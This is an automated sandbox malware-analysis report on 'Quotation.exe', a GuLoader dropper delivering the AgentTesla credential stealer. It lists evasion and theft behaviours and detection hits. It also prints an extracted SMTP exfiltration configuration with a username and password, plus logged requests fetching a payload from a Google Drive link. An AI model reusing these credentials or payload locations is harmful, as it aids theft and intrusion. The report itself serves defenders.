Edit tour

Windows Analysis Report
Quotation.exe

Overview

General Information

Sample name:	Quotation.exe
Analysis ID:	1549339
MD5:	816b7984251ee4c846a7f0d6160624e2
SHA1:	be82357d711260a412103e7fde8785febd060974
SHA256:	648ee80543d70f070c497309e4c7ce090254374da938799074de93bdaafaff5a
Tags:	exeuser-threatcat_ch
Infos:

Detection

AgentTesla, GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected AgentTesla

Yara detected GuLoader

AI detected suspicious sample

Contains functionality to register a low level keyboard hook

Initial sample is a PE file and has a suspicious name

Installs a global keyboard hook

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Switches to a custom stack to bypass stack traces

Tries to detect virtualization through RDTSC time measurements

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to dynamically determine API calls

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evaded block containing many API calls

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Suspicious Outbound SMTP Connections

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

Quotation.exe (PID: 2436 cmdline: "C:\Users\user\Desktop\Quotation.exe" MD5: 816B7984251EE4C846A7F0D6160624E2)

Quotation.exe (PID: 1516 cmdline: "C:\Users\user\Desktop\Quotation.exe" MD5: 816B7984251EE4C846A7F0D6160624E2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://0xmrmagnezi.github.io/malware%20analysis/AgentTesla/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.showpiece.trillennium.biz", "Username": "build@showpiece.trillennium.biz", "Password": "3KJ[T.3]fsSW"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000009.00000002.2518927845.00000000350DC000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000009.00000002.2518927845.00000000350E4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000009.00000002.2518927845.00000000350B1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000002.2518927845.00000000350B1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.1666164955.00000000059B8000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: Quotation.exe PID: 1516	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Quotation.exe PID: 1516	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Click to see the 2 entries

Sigma Signatures

System Summary

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DestinationIp: 67.23.226.139, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\Quotation.exe, Initiated: true, ProcessId: 1516, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49993

Suricata Signatures

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-05T15:07:22.327002+0100	2022930	1	A Network Trojan was detected	172.202.163.200	443	192.168.2.7	49736	TCP
2024-11-05T15:07:50.887278+0100	2022930	1	A Network Trojan was detected	172.202.163.200	443	192.168.2.7	49919	TCP

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-05T15:07:54.512032+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	49936	172.217.18.14	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: Quotation.exe.1516.9.memstrmin

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.showpiece.trillennium.biz", "Username": "build@showpiece.trillennium.biz", "Password": "3KJ[T.3]fsSW"}

Multi AV Scanner detection for submitted file

Source: Quotation.exe

ReversingLabs: Detection: 39%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: Quotation.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.7:49936 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.184.225:443 -> 192.168.2.7:49947 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.7:49977 version: TLS 1.2

Source: Quotation.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\Quotation.exe	Code function: 0_2_004066F7 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,		0_2_004066F7
Source: C:\Users\user\Desktop\Quotation.exe	Code function: 0_2_004065AD FindFirstFileW,FindClose,		0_2_004065AD

Source: global traffic

TCP traffic: 192.168.2.7:49993 -> 67.23.226.139:587

Source: Joe Sandbox View	IP Address: 67.23.226.139 67.23.226.139
Source: Joe Sandbox View	IP Address: 172.67.74.152 172.67.74.152
Source: Joe Sandbox View	IP Address: 172.67.74.152 172.67.74.152

Source: Joe Sandbox View

ASN Name: DIMENOCUS DIMENOCUS

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org

Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.7:49736
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.7:49919
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49936 -> 172.217.18.14:443

Source: global traffic

TCP traffic: 192.168.2.7:49993 -> 67.23.226.139:587

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1bbmPht414dtBMJVsXpJfN6hufkXy59VA HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1bbmPht414dtBMJVsXpJfN6hufkXy59VA&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1bbmPht414dtBMJVsXpJfN6hufkXy59VA HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1bbmPht414dtBMJVsXpJfN6hufkXy59VA&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic	DNS traffic detected: DNS query: api.ipify.org
Source: global traffic	DNS traffic detected: DNS query: mail.showpiece.trillennium.biz

Source: Quotation.exe, 00000009.00000002.2518927845.00000000350DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mail.showpiece.trillennium.biz
Source: Quotation.exe	String found in binary or memory: http://nsis.sf.net/NSIS_Error...
Source: Quotation.exe, 00000009.00000002.2519603323.00000000371A0000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000009.00000002.2518927845.00000000350E4000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 00000009.00000003.1869287899.00000000371A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://r11.i.lencr.org/0
Source: Quotation.exe, 00000009.00000002.2519603323.00000000371A0000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000009.00000002.2518927845.00000000350E4000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 00000009.00000003.1869287899.00000000371A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://r11.o.lencr.org0#
Source: Quotation.exe, 00000009.00000002.2518927845.0000000035061000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Quotation.exe, 00000009.00000002.2518927845.00000000350DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://showpiece.trillennium.biz
Source: Quotation.exe, 00000009.00000002.2519603323.00000000371A0000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000009.00000002.2518927845.00000000350E4000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 00000009.00000003.1869287899.00000000371A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: Quotation.exe, 00000009.00000002.2519603323.00000000371A0000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000009.00000002.2518927845.00000000350E4000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 00000009.00000003.1869287899.00000000371A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: Quotation.exe, 00000009.00000002.2519704345.0000000037219000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/03
Source: Quotation.exe, 00000009.00000002.2518927845.0000000035061000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org
Source: Quotation.exe, 00000009.00000002.2518927845.0000000035061000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/
Source: Quotation.exe, 00000009.00000002.2518927845.0000000035061000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/t
Source: Quotation.exe, 00000009.00000003.1758037630.0000000004CB3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: Quotation.exe, 00000009.00000002.2499184774.0000000004C38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: Quotation.exe, 00000009.00000002.2499184774.0000000004C6C000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000009.00000002.2499404125.0000000004FC0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1bbmPht414dtBMJVsXpJfN6hufkXy59VA
Source: Quotation.exe, 00000009.00000002.2499184774.0000000004C6C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1bbmPht414dtBMJVsXpJfN6hufkXy59VAZH4
Source: Quotation.exe, 00000009.00000002.2499184774.0000000004CB8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: Quotation.exe, 00000009.00000002.2499184774.0000000004CB8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/$K
Source: Quotation.exe, 00000009.00000002.2499184774.0000000004C38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1bbmPht414dtBMJVsXpJfN6hufkXy59VA&export=download
Source: Quotation.exe, 00000009.00000003.1758037630.0000000004CB3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: Quotation.exe, 00000009.00000003.1758037630.0000000004CB3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: Quotation.exe, 00000009.00000003.1758037630.0000000004CB3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: Quotation.exe, 00000009.00000003.1758037630.0000000004CB3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: Quotation.exe, 00000009.00000003.1758037630.0000000004CB3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com

Source: unknown	Network traffic detected: HTTP traffic on port 49947 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49936 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49936
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49947
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49977

Source: unknown	HTTPS traffic detected: 172.217.18.14:443 -> 192.168.2.7:49936 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.184.225:443 -> 192.168.2.7:49947 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.7:49977 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to register a low level keyboard hook

Source: C:\Users\user\Desktop\Quotation.exe

Code function: 9_2_385E8828 SetWindowsHookExA 0000000D,00000000,?,?,?,?,?,?,?,?,?,385E9658,00000000,00000000

9_2_385E8828

Installs a global keyboard hook

Source: C:\Users\user\Desktop\Quotation.exe

Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\Quotation.exe

Jump to behavior

Source: C:\Users\user\Desktop\Quotation.exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

System Summary

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: Quotation.exe

Source: C:\Users\user\Desktop\Quotation.exe

Code function: 0_2_004036DA EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,LdrInitializeThunk,SHGetFileInfoW,GetCommandLineW,LdrInitializeThunk,CharNextW,LdrInitializeThunk,LdrInitializeThunk,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,

0_2_004036DA

Source: C:\Users\user\Desktop\Quotation.exe	Code function: 0_2_73C62351	0_2_73C62351
Source: C:\Users\user\Desktop\Quotation.exe	Code function: 9_2_0015A960	9_2_0015A960
Source: C:\Users\user\Desktop\Quotation.exe	Code function: 9_2_00154A98	9_2_00154A98
Source: C:\Users\user\Desktop\Quotation.exe	Code function: 9_2_00153E80	9_2_00153E80
Source: C:\Users\user\Desktop\Quotation.exe	Code function: 9_2_001541C8	9_2_001541C8
Source: C:\Users\user\Desktop\Quotation.exe	Code function: 9_2_38103128	9_2_38103128
Source: C:\Users\user\Desktop\Quotation.exe	Code function: 9_2_38744B48	9_2_38744B48

Source: Quotation.exe

Static PE information: invalid certificate

Source: Quotation.exe, 00000009.00000002.2499184774.0000000004CAE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Quotation.exe
Source: Quotation.exe, 00000009.00000002.2518815016.0000000034E59000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Quotation.exe

Source: Quotation.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/12@5/4

Source: C:\Users\user\Desktop\Quotation.exe

0_2_004036DA

Source: C:\Users\user\Desktop\Quotation.exe

File created: C:\Users\user\overlays

Jump to behavior

Source: C:\Users\user\Desktop\Quotation.exe

Mutant created: NULL

Source: C:\Users\user\Desktop\Quotation.exe

File created: C:\Users\user~1\AppData\Local\Temp\nsfDAFB.tmp

Jump to behavior

Source: Quotation.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Quotation.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\Quotation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\Quotation.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Quotation.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Quotation.exe

ReversingLabs: Detection: 39%

Source: C:\Users\user\Desktop\Quotation.exe

File read: C:\Users\user\Desktop\Quotation.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Quotation.exe "C:\Users\user\Desktop\Quotation.exe"
Source: C:\Users\user\Desktop\Quotation.exe	Process created: C:\Users\user\Desktop\Quotation.exe "C:\Users\user\Desktop\Quotation.exe"
Source: C:\Users\user\Desktop\Quotation.exe	Process created: C:\Users\user\Desktop\Quotation.exe "C:\Users\user\Desktop\Quotation.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Section loaded: edputil.dll	Jump to behavior

Source: C:\Users\user\Desktop\Quotation.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\Quotation.exe

File written: C:\Users\user\Music\antithetic.ini

Jump to behavior

Source: C:\Users\user\Desktop\Quotation.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles

Jump to behavior

Source: Quotation.exe

Static file information: File size 1182800 > 1048576

Source: Quotation.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000000.00000002.1666164955.00000000059B8000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\Quotation.exe

Code function: 0_2_73C62351 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,LdrInitializeThunk,GlobalAlloc,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GetModuleHandleW,LdrInitializeThunk,LoadLibraryW,GetProcAddress,lstrlenW,

0_2_73C62351

Source: C:\Users\user\Desktop\Quotation.exe	Code function: 9_2_00150C45 push ebx; retf	9_2_00150C52
Source: C:\Users\user\Desktop\Quotation.exe	Code function: 9_2_00150C6D push edi; retf	9_2_00150C7A
Source: C:\Users\user\Desktop\Quotation.exe	Code function: 9_2_385E76D8 push esp; iretd	9_2_385E76E9
Source: C:\Users\user\Desktop\Quotation.exe	Code function: 9_2_385E80D8 push es; ret	9_2_385E80E5
Source: C:\Users\user\Desktop\Quotation.exe	Code function: 9_2_38740500 push dword ptr [ebp+ecx-75h]; retf	9_2_38740507

Source: C:\Users\user\Desktop\Quotation.exe
